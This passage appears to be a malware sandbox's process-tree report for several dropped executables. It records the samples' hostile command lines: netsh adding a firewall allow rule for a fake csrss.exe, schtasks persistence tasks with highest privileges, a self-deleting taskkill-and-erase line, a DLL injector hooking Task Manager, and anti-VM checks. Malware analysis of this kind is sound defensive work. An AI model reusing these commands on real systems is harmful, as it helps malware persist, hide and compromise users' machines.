- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 1084
    3⤵
    - Program crash
    PID:4024
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 1168
    3⤵
    - Program crash
    PID:4400
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 1436
    3⤵
    - Program crash
    PID:4796
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "8Gi6lciEWsBYkwpuiH33GJM_.exe" /f & erase "C:\Users\Admin\Documents\GuardFox\8Gi6lciEWsBYkwpuiH33GJM_.exe" & exit
    3⤵
    PID:784
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "8Gi6lciEWsBYkwpuiH33GJM_.exe" /f
      4⤵
      Kills process with taskkill
      PID:2732
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 1176
    3⤵
    - Program crash
    PID:5296
- C:\Users\Admin\Documents\GuardFox\Sd1A4rqmgdATOCjrYftYlVk8.exe
  "C:\Users\Admin\Documents\GuardFox\Sd1A4rqmgdATOCjrYftYlVk8.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5600
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 372
    3⤵
    - Program crash
    PID:3344
- C:\Users\Admin\Documents\GuardFox\4omtlxE2KgBFstkBqRHJ3VMe.exe
  "C:\Users\Admin\Documents\GuardFox\4omtlxE2KgBFstkBqRHJ3VMe.exe"
  2⤵
  PID:5584
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3580
- - C:\Users\Admin\Documents\GuardFox\4omtlxE2KgBFstkBqRHJ3VMe.exe
    "C:\Users\Admin\Documents\GuardFox\4omtlxE2KgBFstkBqRHJ3VMe.exe"
    3⤵
    PID:7100
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:6700
  - - C:\Windows\system32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      4⤵
      PID:5656
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:7232
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:7452
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:8460
  - - C:\Windows\rss\csrss.exe
      C:\Windows\rss\csrss.exe
      4⤵
      PID:224
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:8032
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        5⤵
        Creates scheduled task(s)
        
        PID:4304
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        5⤵
        
        PID:4412
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:7560
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:8396
    - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        5⤵
        
        PID:7704
- C:\Users\Admin\Documents\GuardFox\nt5BJHeRuAL4rxCDKsRgvs1Z.exe
  "C:\Users\Admin\Documents\GuardFox\nt5BJHeRuAL4rxCDKsRgvs1Z.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:5576
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:1296
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:5512
- - C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\F9kYfzpze5OYnFrEBDA1.exe
    "C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\F9kYfzpze5OYnFrEBDA1.exe"
    3⤵
    PID:2608
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
      4⤵
      PID:5900
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1876 /prefetch:2
        5⤵
        
        PID:4992
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
        5⤵
        
        PID:2704
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3016 /prefetch:1
        5⤵
        
        PID:3504
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3008 /prefetch:1
        5⤵
        
        PID:3464
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2392 /prefetch:8
        5⤵
        
        PID:5156
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4156 /prefetch:1
        5⤵
        
        PID:6156
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4408 /prefetch:1
        5⤵
        
        PID:6352
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:1
        5⤵
        
        PID:6436
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
        5⤵
        
        PID:6524
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
        5⤵
        
        PID:6740
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5560 /prefetch:8
        5⤵
        
        PID:6928
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1
        5⤵
        
        PID:4776
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:1
        5⤵
        
        PID:5960
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6508 /prefetch:8
        5⤵
        
        PID:6680
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6304 /prefetch:1
        5⤵
        
        PID:6696
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6520 /prefetch:1
        5⤵
        
        PID:6684
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6176 /prefetch:8
        5⤵
        
        PID:6848
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6260 /prefetch:8
        5⤵
        
        PID:6476
    - - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5880 /prefetch:8
        5⤵
        
        PID:7508
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4532 /prefetch:8
        5⤵
        
        PID:2696
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.linkedin.com/login
      4⤵
      PID:5672
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff39cb3cb8,0x7fff39cb3cc8,0x7fff39cb3cd8
        5⤵
        
        PID:5220
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,16278317835196621194,14093405363716227959,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 /prefetch:3
        5⤵
        
        PID:5712
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
      4⤵
      PID:6104
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff39cb3cb8,0x7fff39cb3cc8,0x7fff39cb3cd8
        5⤵
        
        PID:5032
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2008,12680326858247453380,12073360191697778118,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 /prefetch:3
        5⤵
        
        PID:6188
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
      4⤵
      PID:4920
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff39cb3cb8,0x7fff39cb3cc8,0x7fff39cb3cd8
        5⤵
        
        PID:2244
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
      4⤵
      PID:8180
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff274e9758,0x7fff274e9768,0x7fff274e9778
        5⤵
        
        PID:7324
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1884 --field-trial-handle=1980,i,5393602021566285528,674770183575587431,131072 /prefetch:8
        5⤵
        
        PID:7656
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1596 --field-trial-handle=1980,i,5393602021566285528,674770183575587431,131072 /prefetch:2
        5⤵
        
        PID:7648
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
      4⤵
      PID:2452
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff274e9758,0x7fff274e9768,0x7fff274e9778
        5⤵
        
        PID:7396
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1860 --field-trial-handle=1972,i,14837426883159466390,2584554103553490410,131072 /prefetch:8
        5⤵
        
        PID:8260
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1584 --field-trial-handle=1972,i,14837426883159466390,2584554103553490410,131072 /prefetch:2
        5⤵
        
        PID:8228
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
      4⤵
      PID:5696
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff274e9758,0x7fff274e9768,0x7fff274e9778
        5⤵
        
        PID:5412
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1736 --field-trial-handle=1988,i,12937134176447365376,10907551089122924849,131072 /prefetch:2
        5⤵
        
        PID:9128
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1928 --field-trial-handle=1988,i,12937134176447365376,10907551089122924849,131072 /prefetch:8
        5⤵
        
        PID:7620
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
      4⤵
      PID:2536
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
        5⤵
        
        PID:2540
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
      4⤵
      PID:5792
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
        5⤵
        
        PID:7600
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7600.0.816648984\1229329128" -parentBuildID 20221007134813 -prefsHandle 1776 -prefMapHandle 1768 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {de6af4b3-0f30-4d05-a8a6-398ba077481d} 7600 "\\.\pipe\gecko-crash-server-pipe.7600" 1872 1eccdad9858 gpu
        6⤵
        
        PID:7392
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7600.1.100499619\1512152703" -parentBuildID 20221007134813 -prefsHandle 2316 -prefMapHandle 2312 -prefsLen 21563 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {791be4ad-8b5f-4c44-875e-30be8b4efcdc} 7600 "\\.\pipe\gecko-crash-server-pipe.7600" 2344 1ecba96ec58 socket
        6⤵
        
        PID:8392
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7600.2.1547528953\636298821" -childID 1 -isForBrowser -prefsHandle 3220 -prefMapHandle 3216 -prefsLen 21666 -prefMapSize 233444 -jsInitHandle 1016 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9ba1fe5-1dd2-4672-b9a9-20478fe1c3e4} 7600 "\\.\pipe\gecko-crash-server-pipe.7600" 3232 1ecd10fa258 tab
        6⤵
        
        PID:4376
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7600.3.1969698435\1018718059" -childID 2 -isForBrowser -prefsHandle 3732 -prefMapHandle 3728 -prefsLen 26064 -prefMapSize 233444 -jsInitHandle 1016 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {79e79581-9b55-4773-b976-6d64c5b3527f} 7600 "\\.\pipe\gecko-crash-server-pipe.7600" 3744 1ecba965758 tab
        6⤵
        
        PID:8580
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7600.4.933373074\1363617100" -childID 3 -isForBrowser -prefsHandle 4724 -prefMapHandle 4740 -prefsLen 26204 -prefMapSize 233444 -jsInitHandle 1016 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a832ce82-7b88-45e7-995d-569537c986fb} 7600 "\\.\pipe\gecko-crash-server-pipe.7600" 4748 1ecd4d03b58 tab
        6⤵
        
        PID:4120
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7600.5.1276821792\559998068" -childID 4 -isForBrowser -prefsHandle 4988 -prefMapHandle 4984 -prefsLen 26204 -prefMapSize 233444 -jsInitHandle 1016 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ecd6b64-6529-4469-94bb-5bbbd29c3ff6} 7600 "\\.\pipe\gecko-crash-server-pipe.7600" 5000 1ecd57e1858 tab
        6⤵
        
        PID:8740
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
      4⤵
      PID:7684
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
        5⤵
        
        PID:2812
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:5976
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:6024
- - C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\9qHBpPmNB78MoXh8yQcR.exe
    "C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\9qHBpPmNB78MoXh8yQcR.exe"
    3⤵
    PID:6516
- - C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\edJKyoMW6gdgLu6ER1j0.exe
    "C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\edJKyoMW6gdgLu6ER1j0.exe"
    3⤵
    PID:5488
